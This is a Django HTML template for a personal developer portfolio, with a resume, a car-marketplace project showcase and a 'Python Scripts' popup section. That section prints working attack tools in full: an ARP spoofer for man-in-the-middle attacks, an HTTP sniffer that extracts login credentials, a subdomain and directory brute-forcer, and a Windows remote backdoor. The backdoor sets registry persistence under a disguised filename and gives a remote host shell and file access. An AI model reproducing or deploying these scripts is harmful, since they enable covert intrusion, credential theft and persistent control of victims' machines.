<!DOCTYPE html>
{% load static %}
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

  <title>Jake's Portfolio</title>
  <meta content="" name="description">
  <meta content="" name="keywords">

  <!-- Favicons -->
  <link href="{% static 'jake_portfolio/assets/img/favicon.png' %}" rel="icon">
  <link href="{% static 'jake_portfolio/assets/img/apple-touch-icon.png' %}" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="{% static 'jake_portfolio/assets/vendor/bootstrap/css/bootstrap.min.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/vendor/bootstrap-icons/bootstrap-icons.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/vendor/boxicons/css/boxicons.min.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/vendor/glightbox/css/glightbox.min.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/vendor/remixicon/remixicon.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/vendor/swiper/swiper-bundle.min.css' %}" rel="stylesheet">

  <!-- Template Main CSS File -->
  <link href="{% static 'jake_portfolio/assets/css/style.css' %}" rel="stylesheet">
  <link href="{% static 'jake_portfolio/assets/css/portfolio.css' %}" rel="stylesheet">

  <link href="https://fonts.googleapis.com/css2?family=PT+Mono&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=PT+Mono&display=swap" rel="stylesheet">


  <!-- =======================================================
  * Template Name: Personal
  * Updated: Jul 27 2023 with Bootstrap v5.3.1
  * Template URL: https://bootstrapmade.com/personal-free-resume-bootstrap-template/
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body>

  <!-- ======= Header ======= -->
  <header id="header">
    <div class="container">

      <h1><a href="{% url 'jake_portfolio:index' %}">Jake Villamor</a></h1>
      <!-- Uncomment below if you prefer to use an image logo -->
      <!-- <a href="index.html" class="mr-auto"><img src="assets/img/logo.png" alt="" class="img-fluid"></a> -->
      <h2>I'm a passionate <span>programmer</span> aspiring to be a full time software/web developer.</h2>

      <nav id="navbar" class="navbar">
        <ul>
          <li><a class="nav-link active" href="#header">Home</a></li>
          <li><a class="nav-link" href="#about">About</a></li>
          <li><a class="nav-link" href="#resume">Resume</a></li>
          <!-- <li><a class="nav-link" href="#services">Services</a></li> -->
          <li><a class="nav-link" href="#portfolio">Portfolio</a></li>
          <li><a class="nav-link" href="#contact">Contact</a></li>
        </ul>
        <i class="bi bi-list mobile-nav-toggle"></i>
      </nav><!-- .navbar -->

      <div class="social-links">
        <a href="#" class="twitter"><i class="bi bi-twitter"></i></a>
        <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
        <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
        <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
      </div>

    </div>
  </header><!-- End Header -->

  <!-- ======= About Section ======= -->
  <section id="about" class="about">

    <!-- ======= About Me ======= -->
    <div class="about-me container">

      <div class="section-title">
        <h2>About</h2>
        <p>Learn more about me</p>
      </div>

      <div class="row">
        <div class="col-lg-4" data-aos="fade-right">
          <img src={% static "jake_portfolio\assets\img\me.jpg" %} class="img-fluid" alt="">
        </div>
        <div class="col-lg-8 pt-4 pt-lg-0 content" data-aos="fade-left">
          <h3>Full Stack Web Developer/Python/Django</h3>
          <p class="fst-italic">
            Hello, I'm Jake, your computer/IT guy.
          </p>
          <div class="row">
            <div class="col-lg-6">
              <ul>
                <li><i class="bi bi-chevron-right"></i> <strong>Birthday:</strong> <span>January 16, 1991</span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>Website:</strong> <span><a href="https://jake-villamor.onrender.com">Jake</a></span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>Phone:</strong> <span>0991 718 6723</span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>City:</strong> <span>Liloan, Cebu, Philippines</span></li>
              </ul>
            </div>
            <div class="col-lg-6">
              <ul>
                <li><i class="bi bi-chevron-right"></i> <strong>Github:</strong> <span><a href="https://github.com/yego21">yego21</a></span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>Degree:</strong> <span>Bachelor</span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>Email:</strong> <span>jakevillamor222@gmail.com</span></li>
                <li><i class="bi bi-chevron-right"></i> <strong>Freelance:</strong> <span>Available</span></li>
              </ul>
            </div>
          </div>
          <p>
          Thanks for visiting my page, this site is still an ongoing work.
          We are all an ongoing work.
          </p>
        </div>
      </div>

    </div><!-- End About Me -->

    <!-- ======= Counts ======= -->

    <!-- ======= Skills  ======= -->
    <div class="skills container">

      <div class="section-title">
        <h2>Skills</h2>
      </div>

      <div class="row skills-content">

        <div class="col-lg-6">

          <div class="progress">
            <span class="skill">HTML/CSS <i class="val">65%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="65" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

          <div class="progress">
            <span class="skill">JavaScript <i class="val">60%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="60" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

          <div class="progress">
            <span class="skill">Python <i class="val">80%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="80" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

        </div>

        <div class="col-lg-6">

          <div class="progress">
            <span class="skill">Django <i class="val">80%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="80" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

          <div class="progress">
            <span class="skill">Git/Github <i class="val">70%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="70" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

          <div class="progress">
            <span class="skill">Photoshop <i class="val">55%</i></span>
            <div class="progress-bar-wrap">
              <div class="progress-bar" role="progressbar" aria-valuenow="55" aria-valuemin="0" aria-valuemax="100"></div>
            </div>
          </div>

        </div>

      </div>

    </div><!-- End Skills -->

    <!-- ======= Interests ======= -->
    <div class="interests container">

      <div class="section-title">
        <h2>Interests</h2>
      </div>

      <div class="row">
        <div class="col-lg-3 col-md-4">
          <div class="icon-box">
            <i class="ri-terminal-box-line" style="color: #ffbb2c;"></i>
            <h3>Coding</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4 mt-md-0">
          <div class="icon-box">
            <i class="ri-folder-music-line" style="color: #5578ff;"></i>
            <h3>Music</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4 mt-md-0">
          <div class="icon-box">
            <i class="ri-plant-line" style="color: #e80368;"></i>
            <h3>Nature</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4 mt-lg-0">
          <div class="icon-box">
            <i class="ri-lightbulb-line" style="color: #e361ff;"></i>
            <h3>Philosophy</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4">
          <div class="icon-box">
            <i class="ri-robot-line" style="color: #47aeff;"></i>
            <h3>Technology</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4">
          <div class="icon-box">
            <i class="ri-movie-2-line" style="color: #ffa76e;"></i>
            <h3>Movies</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4">
          <div class="icon-box">
            <i class="ri-gamepad-line" style="color: #11dbcf;"></i>
            <h3>Video Games</h3>
          </div>
        </div>
        <div class="col-lg-3 col-md-4 mt-4">
          <div class="icon-box">
            <i class="ri-brain-line" style="color: #4233ff;"></i>
            <h3>Learning</h3>
          </div>
        </div>

        </div>
      </div>

    </div><!-- End Interests -->

    <!-- ======= Testimonials ======= -->


  </section><!-- End About Section -->

  <!-- ======= Resume Section ======= -->
  <section id="resume" class="resume">
    <div class="container">

      <div class="section-title">
        <h2>Resume</h2>
        <p>Check My Resume</p>
      </div>

      <div class="row">
        <div class="col-lg-6">
          <h3 class="resume-title">Sumary</h3>
          <div class="resume-item pb-0">
            <h4>Jake Villamor</h4>
            <p><em>Works well independently, or in a group setting. Can provide facets of computer support such as troubleshooting, installations,
and maintenance. In-depth knowledge and understanding of numerous software packages. Very good analytical, logical, and
problem solving skills. Quick learner, resourceful, innovative, mindful, and healthy. Communicates well and outstanding stress
handling skills. Willing to be trained and eager to learn.</em></p>
            <p>
            <ul>
              <li>Sambag, San Vicente, Liloan, Cebu</li>
              <li>(0991 718 6723)</li>
              <li>jakevillamor222@gmail.com</li>
            </ul>
            </p>
          </div>

          <h3 class="resume-title">Education</h3>
          <div class="resume-item">
            <h4>BACHELOR OF SCIENCE IN INFORMATION TECHNOLOGY</h4>
            <h5>2007-2011</h5>
            <p><em>Asian College of Technology</em></p>
          </div>
        </div>
        <div class="col-lg-6">
          <h3 class="resume-title">Previous Work Experience</h3>
          <div class="resume-item">
            <h4>Production Associate</h4>
            <h5>2011 - 2013</h5>
            <p><b>INNODATA KNOWLEDGE SERVICES</b></p>
            <p><em>INCHVG IT Park Lopez Jaena St, Mandaue City</em></p>
            <p>
            <ul>
              <li>Formatter
• Format text-converted image files using various HTML tags.</li>
              <li>Proofreader
              • Ensure text integrity of formatted text files by proofreading. </li>
              <li>Data Entry
              • Analyze legal documents and extract the necessary information to be entered directly into the client’s database.</li>
              <li>Styler
              • Analyze and style legal documents in HTML format by providing divisions using customized headers for better readabilityLead in the</li>
            </ul>
            </p>
          </div>
          <div class="resume-item">
            <h4>Transaction Processor</h4>
            <h5>2013 - 2015</h5>
            <p><b>XEROX BUSINESS SERVICES PHILIPPINES, INC.</b></p>
            <p><em>Skyrise 2 Building, Geonzon Street, Asiatown It Park, Cebu City, Cebu</em></p>
            <p>
            <ul>
              <li>Data Entry
• Analyze documents and extract the necessary information to be entered directly into the client’s database.
 Certificate of Recognition – Top performer for three months</li>
            </ul>
            </p>
          </div>
        </div>
      </div>

    </div>
  </section><!-- End Resume Section -->

  <!-- ======= Services Section ======= -->
  <section id="services" class="services">
    <div class="container">

      <div class="section-title">
        <h2>Services</h2>
        <p>My Services</p>
      </div>

      <div class="row">
        <div class="col-lg-4 col-md-6 d-flex align-items-stretch">
          <div class="icon-box">
            <div class="icon"><i class="bx bxl-dribbble"></i></div>
            <h4><a href="">Lorem Ipsum</a></h4>
            <p>Voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi</p>
          </div>
        </div>

        <div class="col-lg-4 col-md-6 d-flex align-items-stretch mt-4 mt-md-0">
          <div class="icon-box">
            <div class="icon"><i class="bx bx-file"></i></div>
            <h4><a href="">Sed ut perspiciatis</a></h4>
            <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore</p>
          </div>
        </div>

        <div class="col-lg-4 col-md-6 d-flex align-items-stretch mt-4 mt-lg-0">
          <div class="icon-box">
            <div class="icon"><i class="bx bx-tachometer"></i></div>
            <h4><a href="">Magni Dolores</a></h4>
            <p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia</p>
          </div>
        </div>

        <div class="col-lg-4 col-md-6 d-flex align-items-stretch mt-4">
          <div class="icon-box">
            <div class="icon"><i class="bx bx-world"></i></div>
            <h4><a href="">Nemo Enim</a></h4>
            <p>At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis</p>
          </div>
        </div>

        <div class="col-lg-4 col-md-6 d-flex align-items-stretch mt-4">
          <div class="icon-box">
            <div class="icon"><i class="bx bx-slideshow"></i></div>
            <h4><a href="">Dele cardo</a></h4>
            <p>Quis consequatur saepe eligendi voluptatem consequatur dolor consequuntur</p>
          </div>
        </div>

        <div class="col-lg-4 col-md-6 d-flex align-items-stretch mt-4">
          <div class="icon-box">
            <div class="icon"><i class="bx bx-arch"></i></div>
            <h4><a href="">Divera don</a></h4>
            <p>Modi nostrum vel laborum. Porro fugit error sit minus sapiente sit aspernatur</p>
          </div>
        </div>

      </div>

    </div>
  </section><!-- End Services Section -->

  <!-- ======= Portfolio Section ======= -->
  <section id="portfolio" class="portfolio">

    <div class="container">
      <div class="section-title">
        <h2>Portfolio</h2>
        <p>My Works</p>
      </div>

      <div class="row">
        <div class="col-lg-12 d-flex justify-content-center">
          <ul id="portfolio-flters">
            <li data-filter=".filter-web" class="filter-active">Web</li>
            <li data-filter=".filter-game_dev">Game Dev</li>
              <!-- <a href="{% url 'jake_portfolio:py_scripts' %}"> -->
          <li data-filter=".filter-others">Others</li>

          </ul>
        </div>
      </div>




<div class="row portfolio-container">
      <div class="col-lg-12 col-md-12 portfolio-item filter-web">
        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone1.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Carzone</h2></center>
            <center><p>A fully functional car selling and rental web application with very intuitive and convinient features.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone2.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Search Form</h2></center>
            <center><p>Users can search according to their preferences, be it model, location, or manufacturing year.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone3.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Full Page Search</h2></center>
            <center><p>Or just use the full page search feature available from anywhere in the website.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone4.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Send Inquiry</h2></center>
            <center><p>Users can send inquiry about any car they may choose, site admins are instantly informed through email.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone5.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Dashboard</h2></center>
            <center><p>Authenticated users have access to the dashboard and can monitor their existing inquiries.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone6.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Login Feature</h2></center>
            <center><p>Login feature which not only allows users to make a Carzone account but also utilizes social login such as with Facebook and Google.</p></center>
        </div></br><hr>

        <div class=""></br>
            <center><img src="{% static 'jake_portfolio/assets/img/portfolio/carzone7.png' %}" alt="Sample Image" style="max-width: 80%; height: auto;"></center>
        </div>
        <div class="portfolio_description"></br>
            <center><h2>Contact Form</h2></center>
            <center><p>Finally, a full featured contact form where anyone can send a message to Carzone and ask any questions they want.</p></center>
        </div></br><hr>
        <center><h4>Visit the website here: <a href="https://carzone-p58h.onrender.com">carzone-p58h.onrender.com</a></h4></center>
    </div>

    <div class="col-lg-12 col-md-12 portfolio-item filter-game_dev">
    </div>


    <div class="col-lg-12 col-md-12 portfolio-item filter-others">
        <style>
          .popup-body {
            font-family: Arial, sans-serif;
          }

          /* Styles for the popup overlay */

          @media (max-width: 500px) {
              .popup-overlay .popup-content {
                  width: 50%;
                }
              }

          .popup-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 1000;

          }


          /* Styles for the popup content */
          .popup-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #091408;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.3);
            z-index: 1001;
            color: #ffffff;

            /* Add these styles for scrolling */
            max-height: 80%; /* Set a maximum height */
            overflow: auto; /* Enable scrolling when content exceeds max-height */
          }

          /* Close button style */
          .close-button {
            position: absolute;
            top: 10px;
            right: 10px;
            cursor: pointer;
          }

          .green-underline-button {
            font-family: 'PT Mono', monospace;
            display: inline-block;
            padding: 5px 10px;
            font-size: 16px;
            color: #ffffff;
            background-color: transparent;
            border: none;
            border-bottom: 2px solid #00a859;
            border-left: 2px solid #00a859;
            border-right: 2px solid #00a859;
            cursor: pointer;
            transition: border-color 0.3s;
          }

          .green-underline-button:hover {
            border-color: #006b3e;
            border-bottom: 0px;
            color: #38eb5d
          }

          .green-underline-button.right-scr {
            border-left: 0px;
          }

          .green-underline-button.left-scr {
            border-right: 0px;
          }

          #iframe1 {
          display: block;
          border: none;
        }

          .hover-iframe {
            display: none;
            border: none;
          }

          #python {
            color: #18d26e;
            font-family: 'PT Mono', monospace;
          }

          h3 {
            display: inline;
          }

          pre {
            font-family: 'PT Mono', monospace;
            color: #f7f5f0;
          }



        </style>

<center>
  <h3 id="python">Python</h3><h3> Scripts</h3></br></br></br>

  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe1" data-popup-id="popup1">MAC Address Changer (Linux)</button>
  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe2" data-popup-id="popup2">Network Scanner</button>
  <button class="openPopupButton green-underline-button hover-button left-scr" data-iframe-id="iframe3" data-popup-id="popup3">ARP Spoofer (MITM Attack)</button>
  <button class="openPopupButton green-underline-button hover-button right-scr" data-iframe-id="iframe4" data-popup-id="popup4">Packet Sniffer (While MITM)</button>
  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe5" data-popup-id="popup5">Website Crawler</button>
  <button class="openPopupButton green-underline-button hover-button left-scr" data-iframe-id="iframe6" data-popup-id="popup6">Port Listener</button>
  <button class="openPopupButton green-underline-button hover-button right-scr" data-iframe-id="iframe6" data-popup-id="popup6">Remote Backdoor</button>
  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe7" data-popup-id="popup7">Keylogger (via email report)</button>
  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe8" data-popup-id="popup8">File Getter/Stealer</button>
  <button class="openPopupButton green-underline-button hover-button" data-iframe-id="iframe9" data-popup-id="popup9">Vulnerability Scanner</button></br></br>
</center>


  <!-- Popup overlay -->



  <div class="popup-overlay" id="popup1">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup1">&times;</span>
      <pre id="popup1Content">

              <--------------------------------- MAC CHANGER ------------------------------------>


        #!/usr/bin/env python

        import subprocess
        import optparse
        import re


        def get_args():

            parser = optparse.OptionParser()
            parser.add_option("-i", "--interface", dest="interface", help="select interface")
            parser.add_option("-m", "--mac", dest="new_mac", help="Enter new MAC address")
            parser.add_option("--show all", dest="show_int", help="Display all network interfaces.")
            (opts, args) = parser.parse_args()


            if not opts.interface:
                 parser.error("Please input interface, type --help for more details")
            elif not opts.new_mac:
                parser.error("Please input new MAC address, type --help for more details")

            return opts, args

        def change_mac(interface, new_mac):
            subprocess.call(["ifconfig", interface, "down"])
            subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
            subprocess.call(["ifconfig", interface, "up", ])
            print("[+] Changing MAC Address to " + new_mac)


        def get_current_mac(interface):
            show_ifconfig = subprocess.check_output(["ifconfig", interface])
            mac_regex = '\w\w:\w\w:\w\w:\w\w:\w\w:\w\w'
            ifconfig_mac = re.search(mac_regex, str(show_ifconfig))
            if ifconfig_mac:
                return ifconfig_mac.group(0)

            else:
                print("Could not read MAC Address.")


        current_mac = get_current_mac(opts.interface)
        print("Current MAC Address " + str(current_mac))
        change_mac(opts.interface, opts.new_mac)

        current_mac = get_current_mac(opts.interface)
        if current_mac == opts.new_mac:
            print("[+] Address successfully changed to" + opts.new_mac)
      </pre>
    </div>
  </div>

  <div class="popup-overlay" id="popup2">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup2">&times;</span>
      <pre id="popup2Content">

        <--------------------------------- NETWORK SCANNER ------------------------------------>


        #!usr/bin/python/env

        import scapy.all as scapy
        import scapy.layers.l2 as scapyA
        import optparse


        def get_arguments():
            parser = optparse.OptionParser()
            parser.add_option("-t", "--target", dest="target", help="Target IP/Client")
            options = parser.parse_args()[0]
            return options

        def scan(ip):
            arp_request = scapyA.ARP(pdst=ip)
            broadcast = scapyA.Ether(dst="ff:ff:ff:ff:ff:ff")
            # scapy.ls(scapyA.ARP())
            arp_broadcast_request = broadcast/arp_request
            answered_list = scapyA.srp(arp_broadcast_request, timeout=1)[0]
            # print(answered.summary())


            client_list=[]
            for e in answered_list:
                # print(e)
                # print(e[1].psrc+"\t\t"+e[1].hwsrc)
                client_dict={"IP":e[1].psrc, "MAC Address":e[1].hwsrc}
                client_list.append(client_dict)
                # print("================================+++++++++++++++++++++++++++++++++++++++++++===============================")

            return(client_list)
        def print_result(result_list):
            print("IP\t\t\tMAC Address\n=======================================================================================")
            for client in result_list:
                print(client["IP"]+"\t\t"+client["MAC Address"])

        target_client = get_arguments()
        scan_result = scan(target_client.target)
        print_result(scan_result)
      </pre>
    </div>
  </div>

  <div class="popup-overlay" id="popup3">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup3">&times;</span>
      <pre id="popup2Content">

        <--------------------------------- ARP SPOOFER ------------------------------------>


        #!usr/bin/python/env
        import sys
        import scapy.all as scapy
        import scapy.layers.l2 as scapyA
        import optparse
        import time
        import os

        def spoof(target_IP, spoof_IP):
            target_mac = get_mac((target_IP))
            packet = scapyA.ARP(op=2, pdst=target_IP, hwdst=target_mac, psrc=spoof_IP)
            print(target_mac+"\n")
            scapy.send(packet, verbose=False)

        def restore(dest_IP, source_IP):
            dest_MAC = get_mac((dest_IP))
            source_MAC = get_mac(source_IP)
            packet = scapyA.ARP(op=2, pdst=dest_IP, hwdst=dest_MAC, psrc=source_IP, hwsrc=source_MAC)
            scapy.send(packet, count=4, verbose=False)


        def get_mac(target_IP):
            arp_req = scapyA.ARP(pdst=target_IP)
            broadcast = scapyA.Ether(dst="ff:ff:ff:ff:ff:ff")
            arp_broadcast_req = broadcast/arp_req
            answer = scapyA.srp(arp_broadcast_req, timeout=1, verbose=False)[0]

            for e in answer:
                  mac = e[1].hwsrc
                  return mac

        target_IP = "192.168.46.129"
        gateway_IP = "192.168.46.2"

        sent_packets = 0
        try:
            while True:
                spoof(target_IP, gateway_IP)
                spoof(gateway_IP, target_IP)
                sent_packets = sent_packets + 2
                print("\r[+] Packets sent: " + str(sent_packets), end="")
                sys.stdout.flush()
                time.sleep(2)
        except KeyboardInterrupt:
            print("\n Ctrl + C pressed, Resetting ARP Table, please wait...")
            restore(target_IP, gateway_IP)
            restore(gateway_IP, target_IP)


      </pre>
    </div>
  </div>

  <div class="popup-overlay" id="popup4">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup4">&times;</span>
      <pre id="popup2Content">

        <--------------------------------- PACKET SNIFFER ------------------------------------>


        #! usr/bin/env python
        import scapy.all as scapy
        from scapy.layers import http
        import scapy.utils as scapyU

        def sniff(interface):
            scapy.sniff(iface=interface, store=False, prn=sniff_packet)

        def get_url(packet):
            url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
            return url

        def get_login_info(packet):
            if packet.haslayer(scapy.Raw):
                keywords = ["User", "Username", "Password", "Login", "login", "un", "pass"]
                load = str(packet[scapy.Raw].load)
                for keyword in keywords:
                    if keyword in load:
                        return load

        def sniff_packet(packet):

            if packet.haslayer(http.HTTPRequest):
                url = get_url(packet)
                login_info = get_login_info(packet)
                print("[+] HTTP Request >>" + str(url))
                print("Possible Login Information: " + str(login_info))

        sniff("eth0")




      </pre>
    </div>
  </div>

  <div class="popup-overlay" id="popup5">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup5">&times;</span>
      <pre id="popup2Content">

        <--------------------------------- WEBSITE CRAWLER ------------------------------------>


        #!usr/bin/python/env
        import requests, urllib.parse, re

        def get_response(url):
            try:
                req = requests.get(url)
                if req.status_code == requests.codes.ok:
                    print(requests.get(url))
                    return req
            except requests.exceptions.ConnectionError:
                pass

        url = "hackthissite.org"
        with open ("subdomains.txt", "r") as wordlist:
            for word in wordlist:
                word = word.strip()
                test_url = "http://" + word + "." + url
                result = get_response(test_url)
                if result:
                    print("[+] Discovered subdomain --> " + test_url)

        dir_url = "192.168.46.128"
        with open ("files-and-dirs.txt", "r") as wordlist:
            for word in wordlist:
                word = word.strip()
                test_url = "http://" + dir_url + "/" + word
                # print(test_url)
                result = get_response(test_url)

                if result:
                    print("[+] Discovered subdirectory --> " + test_url)


        url = "https://carzone-p58h.onrender.com"
        link_list = []
        def get_href_links(url):
            content = requests.get(url)
            links = re.findall('(?:href=")(.*?)"', str(content.content))
            return links

        def crawl(url):
            links = get_href_links(url)
            for link in links:
                link = urllib.parse.urljoin(url, link)
                if "#" in link:
                    link = link.split("#")[0]
                if url in link and link not in link_list:
                    link_list.append(link)
                    print(link)
                    crawl(link)

        crawl(url)

      </pre>
    </div>
  </div>

  <div class="popup-overlay" id="popup6">
    <div class="popup-content">
      <span class="close-button" data-popup-id="popup6">&times;</span>
      <pre id="popup2Content">
        # -*- coding: utf-8 -*-

        import socket
        import subprocess
        import re, json
        import os
        import base64
        import sys
        import shutil

        class Backdoor:
            def __init__(self, ip, port):
                self.persist_exec()
                self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.connection.connect((ip, port))
                # connection.send(b"\nConnected\n")

            def persist_exec(self):
                file_loc = os.environ["Appdata"] + "\\winload64.exe"
                if not os.path.exists(file_loc):
                    shutil.copyfile(sys.executable, file_loc)
                    subprocess.call("reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d '"+ file_loc +"'")
                    print("REGEDIT SUCCESSFUL")

            def execute_command(self, command):
                command_result =  command_result = subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
                return (command_result.decode('utf-8'))

            def change_working_directory(self, path):
                os.chdir(path)
                return "[+] Changing working directory to '" + path +"'"

            def write_file(self, path, content):
                with open(path, "wb") as new_file:
                    new_file.write(base64.b64decode(content))
                    print("[+] Upload Successful.")


            def read_file(self, path):
                with open (path, "rb") as file:
                    file_content = base64.b64encode(file.read())
                    print(type(file_content))
                    file_str = file_content.decode()
                    # print(file_str)
                    return file_str


            def reliable_send(self, data):
                json_data = json.dumps(data)
                # json_data = json_data.decode('utf-8')
                self.connection.send(bytes(json_data.encode()))


            def reliable_recv(self):
                json_data = b""
                while True:
                    try:
                        json_data = json_data + self.connection.recv(1024)
                        return json.loads(json_data)
                    except ValueError:
                        continue

            def run(self):
                while True:

                    command = self.reliable_recv()
                    try:
                        res = ""
                        for i in range(len(command)):

                            if i == 0:
                                res += str(command[i])
                            else:
                                res += " " + str(command[i])

                        if command[0] == "exit":
                            self.connection.close()
                            sys.exit()
                        elif command[0] == "cd" and len(command) > 1:
                            print(command[1])
                            command_result = self.change_working_directory(command[1])
                        elif command[0] == "dl":
                            command_result = self.read_file(command[1])
                        elif command[0] == "ul":
                            command_result = self.write_file(command[1], command[2])
                            print("[+] File Created.")
                        else:
                            command_result = self.execute_command(str(res))
                    except Exception:
                        command_result = "[!] Error during command execution, please recheck!"
                    # print("COMMANDDDDDDDDDDDDDDDDD" + (str(res[1])))
                    # commandre = re.search("(?:b')(.*)", str(command))
                    # commandd = commandre.group(1)
                    # final_command = commandd.replace("'","")
                    # final_command = commandd.replace('""','')
                    # print(final_command)
                    # self.connection.send(command_result)
                    self.reliable_send(command_result)
                    print(command_result)

        # front_file = sys._MEIPASS + "\Vecteezy-License-Information.pdf"
        # subprocess.Popen(front_file, shell=True)

        try:
            my_backdoor = Backdoor("192.168.1.145", 4444)
            my_backdoor.run()

        except Exception:
            sys.exit()

      </pre>
    </div>
  </div>
<center>
  <iframe id="iframe1" class="hover-iframe" src="https://www.youtube.com/embed/cvnzPCGGD" width ="1000px" height="800px"></iframe>
  <iframe id="iframe2" class="hover-iframe" src="https://www.youtube.com/embed/pZyMxhDTi" width ="1000px" height="800px"></iframe>

</div>
</center>






  </div>
</div>
</div>





  </section><!-- End Portfolio Section -->

  <!-- ======= Contact Section ======= -->
  <section id="contact" class="contact">
    <div class="container">

      <div class="section-title">
        <h2>Contact</h2>
        <p>Contact Me</p>
      </div>

      <div class="row mt-2">

        <div class="col-md-6 d-flex align-items-stretch">
          <div class="info-box">
            <i class="bx bx-map"></i>
            <h3>My Address</h3>
            <p>Liloan, Cebu</p>
          </div>
        </div>

        <div class="col-md-6 mt-4 mt-md-0 d-flex align-items-stretch">
          <div class="info-box">
            <i class="bx bx-share-alt"></i>
            <h3>Social Profiles</h3>
            <div class="social-links">
              <a href="#" class="twitter"><i class="bi bi-twitter"></i></a>
              <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
              <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
              <a href="#" class="google-plus"><i class="bi bi-skype"></i></a>
              <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
            </div>
          </div>
        </div>

        <div class="col-md-6 mt-4 d-flex align-items-stretch">
          <div class="info-box">
            <i class="bx bx-envelope"></i>
            <h3>Email Me</h3>
            <p>jakevillamor222@gmail.com</p>
          </div>
        </div>
        <div class="col-md-6 mt-4 d-flex align-items-stretch">
          <div class="info-box">
            <i class="bx bx-phone-call"></i>
            <h3>Call Me</h3>
            <p>0991 718 6723</p>
          </div>
        </div>
      </div>

